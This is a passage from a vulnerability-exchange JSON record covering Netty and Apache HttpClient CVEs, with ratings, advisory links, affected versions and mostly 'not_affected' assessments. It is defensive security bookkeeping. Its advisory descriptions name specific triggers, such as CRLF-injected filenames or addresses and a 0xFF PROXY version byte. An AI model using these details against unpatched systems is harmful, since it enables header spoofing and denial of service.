          "vector": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        93
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, HttpPostRequestEncoder constructs multipart HTTP request bodies by directly concatenating user-supplied filenames and field names into Content-Disposition MIME headers without validating or sanitizing CRLF characters (\\r\\n). Since MIME headers are delimited by CRLF, an attacker who controls the filename can inject arbitrary MIME headers into the multipart body part. The root cause is that neither the encoder nor the FileUpload implementations' setFilename() methods, which only check for null, neutralize CRLF characters before the filename is embedded into the header. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59921"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59921"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-gcjf-9mgh-3p7g"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59921"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59921"
        }
      ],
      "published": "2026-07-28T23:17:09+00:00",
      "updated": "2026-08-07T15:05:47+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#b76b6b26-b0c9-4ac8-88af-0e5e14ae23d3"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#fe689fa7-681f-47bb-9e70-fdf1171af8d0"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#cae7d5f7-3588-4369-9097-6272034260b2"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f420e16f-30bf-44f9-93ce-a46887770775"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#a5c917b4-0056-4567-9436-e0da979e881b"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e67bf00e-91a6-447e-aee1-ea97dedcee0d"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#9e9577b7-2f21-451d-901d-fff65ea797f9"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#e5898215-a0f7-47fb-ae3c-67a907fe3095"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#a5f42101-6e53-47d2-80ad-32eb668ec13f"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#dcdd13bb-65e3-4cac-a2dd-ba8e06a00846"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#13871a8f-3a1f-4a41-960a-3cac1b9dfa40"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#cfad0975-7df3-4477-b02e-e58461be3833"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#fdd467e2-3396-4339-9a0c-2068b1de59cd"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#fe3c1679-6d69-4fe3-ae7d-c0a397ed5e60"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#e51e03bf-2ce2-4c6b-99f5-9483acf64cfd"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#ee371009-2545-4e62-924d-88f8de37c156"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#f6fd5979-38ba-4df3-8db0-831120dec4b3"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#7303ed0c-a89f-4e45-baf3-34b53d573e03"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-64607",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        772
      ],
      "description": "HttpClient based on the classic i/o model fails to correctly release the underlying connection back to the connection manager if it encounters an invalid or unsupported `Content-Encoding` header value in the response message.\u00a0Please note this defect does not affect HttpClient based on the async i/o model.\n\nThis issue affects Apache HttpComponents Client: from 5.0-alpha1 through 5.6.2.",
      "recommendation": "Upgrade org.apache.httpcomponents.client5:httpclient5 to version 5.6.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-64607"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/08/13/5"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/commit/55733f4121f7ba26ddf04fe12739d9c15962cb94"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/commit/ebac9512f555c4a355cad3f59ef2db69b597cc97"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/releases/tag/rel/v5.6.3"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/releases/tag/rel/v5.7-alpha1"
        },
        {
          "url": "https://lists.apache.org/thread/qqfzo3fqcdk4l5496vz95ppvl4ty511q"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-64607"
        }
      ],
      "published": "2026-07-31T11:17:11+00:00",
      "updated": "2026-08-13T17:17:33+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4",
          "versions": [
            {
              "version": "5.4.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4",
          "versions": [
            {
              "version": "5.4.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.0.3",
          "versions": [
            {
              "version": "5.0.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.5",
          "versions": [
            {
              "version": "5.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.3",
          "versions": [
            {
              "version": "5.4.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#e3505560-6bed-43e7-89d0-c20b3b41a9c0"
        },
        {
          "ref": "urn:cdx:1c2d07e7-bc46-4c64-85c9-cf1f4b389599/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.0.3"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#c7c84ae0-2fa6-4d31-b746-bb14f00cd79d"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#f3db7f2c-4383-4b87-9e0c-a187df539580"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#e77b6f0c-0997-46c5-919d-18c43e564585"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.0.3"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.3"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.0.3"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#ba48b2cc-2e79-4213-af6d-149557f3db2e"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#f094f85a-200d-4e91-8e37-9949d61d254c"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f87bd8f0-d3a0-456c-842d-a7ab3d9a8081"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#503bf026-1bc0-45af-a068-af1638a23a88"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.3"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#f6ea6bd6-dc58-48c9-959f-202dd5a99338"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#ff1f2b8b-c4a4-4149-b486-c7a95571d4b9"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#d180d8d6-9907-4682-9210-24e064db0032"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.3"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#882ade5b-49f7-4aeb-8ac2-c1626acb4dfd"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#ffdff0a0-924d-4349-897b-62a9c296bb50"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#9586c696-c13c-4635-b593-500391801342"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.3"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#9c4b1dd6-a418-427c-bfbc-ab6264cf0cd6"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#c88b18a9-429d-4727-9263-c15e147f894b"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#a67abc80-e403-46ab-94cd-bae5402226b8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#83267551-8684-4e6b-a33e-9e8a6a8ea46c"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#4b65ff54-3ede-4da3-a40f-626a0922a396"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.3"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#dba122cb-4ff2-4b75-839c-7ee7c39eb615"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#7294689b-78ce-4f3a-96eb-44fa2812cf03"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#dd19763e-a226-47c6-8de5-cb0e8077456a"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.3"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#8648e5c4-e6e8-40f8-8cde-00ab150f829f"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#79b1d866-cc89-492c-a72b-aac0921f99c4"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#d3bc1cd3-6130-40fc-bf65-071ee7a3dcdf"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#b8d34ebf-0e01-44ff-b81d-ff9e38d0cbd0"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.0.3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-73508",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        772
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to 4.1.136.Final and 4.2.16.Final, io.netty.handler.codec.dns.AbstractDnsRecord, io.netty.handler.codec.dns.DefaultDnsRecordDecoder.decodeRecord(), and io.netty.handler.codec.dns.DnsCodecUtil.decompressDomainName() failed to release retained or newly allocated ByteBuf objects when IDN.toASCII() or encodeDomainName() rejected a malformed domain name, allowing unauthenticated remote DNS packets to leak direct memory incrementally until denial of service. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-dns to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-73508"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-73508"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/pull/17063"
        },
        {
          "url": "https://github.com/netty/netty/pull/17065"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-mfg7-5gfp-c4w3"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-73508"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-73508"
        }
      ],
      "published": "2026-08-13T15:20:17+00:00",
      "updated": "2026-08-13T18:18:17+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-dns@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-dns@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-dns@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#f26c7eb4-cd2b-4192-a878-1ecd5a1d99ee"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#pkg:maven/io.netty/netty-codec-dns@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-dns@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/io.netty/netty-codec-dns@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#b76a40c3-e13d-400e-bb05-17a937dc896d"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#f0b82c88-acb0-40ba-8096-1a185bb7a4fb"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-dns@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-dns@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#fe51950a-023e-44ac-9153-dfd12167a4f8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#af10209b-840e-4a24-bf1e-91a86681e779"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e37f2170-1867-46e2-90ec-d033b40f8726"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#86db38fb-ba93-4e46-8135-c78bf8070728"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#c63eef79-0710-49b0-b46d-772ee594f030"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#a6979ecb-5f88-4c37-af92-b7468ebff92a"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#dacad526-246f-4d7e-9eec-221589e2533a"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#5bf26d48-7623-4168-9f94-0a724d5de31f"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#fa30fda0-d841-4484-8061-82ad164d7a08"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#ca3d574a-7c12-46a1-95d2-31086ae20a7b"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#e9289d61-321b-425e-8a30-c6c8eb548713"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#f7017a74-60a5-400c-b68c-2484d28eeceb"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#fd735206-e949-4252-9d18-3d4b6a83a411"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#f180f77f-bff2-459c-a2a4-f58bef938add"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-dns@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#2de317a3-8a97-4a58-8925-74c45c8185da"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-55851",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final up to (but not including) 4.2.16.Final, and 4.1.0.Final up to (but not including) 4.1.135, the `HAProxyMessageDecoder` in Netty's `codec-haproxy` module performs protocol version detection by reading the 13th byte as a signed Java `byte` and widening it to `int` without masking; a PROXY protocol v2 binary prefix followed by version byte `0xFF` sign-extends to `-1`, collides with the decoder's need-more-data sentinel, and causes `ByteToMessageDecoder` to accumulate inbound bytes in an unbounded `cumulation` buffer until direct memory is exhausted. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-haproxy to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-55851"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-55851"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-q6cq-mhr2-jmr5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55851"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-55851"
        }
      ],
      "published": "2026-07-21T22:17:14+00:00",
      "updated": "2026-07-30T14:48:31+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. The only genuine wiring of the HAProxy decoder anywhere in the CP repo set is exclusively Confluent Cloud infrastructure that is not shipped with Confluent Platform."
      }
    },
    {
      "id": "CVE-2026-59919",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        93
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.136.Final and 4.2.16.Final, Netty's HAProxy encoder (\u00a0HAProxyMessageEncoder\u00a0) writes AF_UNIX source and destination socket addresses into the HAProxy V1 text protocol without validating them for CRLF characters, so an attacker who controls an AF_UNIX address can inject \u00a0\\r\\n\u00a0 sequences and split the single PROXY header into multiple lines. This is possible because the V1 protocol uses CRLF as its line terminator and, unlike IPv4/IPv6 addresses whose format checks implicitly reject CRLF, AF_UNIX addresses are only validated for length (up to 108 bytes), allowing a forged second PROXY header line that spoofs the client source/destination IP to a downstream server or load balancer. The issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-haproxy to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59919"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59919"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-wh89-7897-x99h"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59919"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59919"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:33:28+00:00",
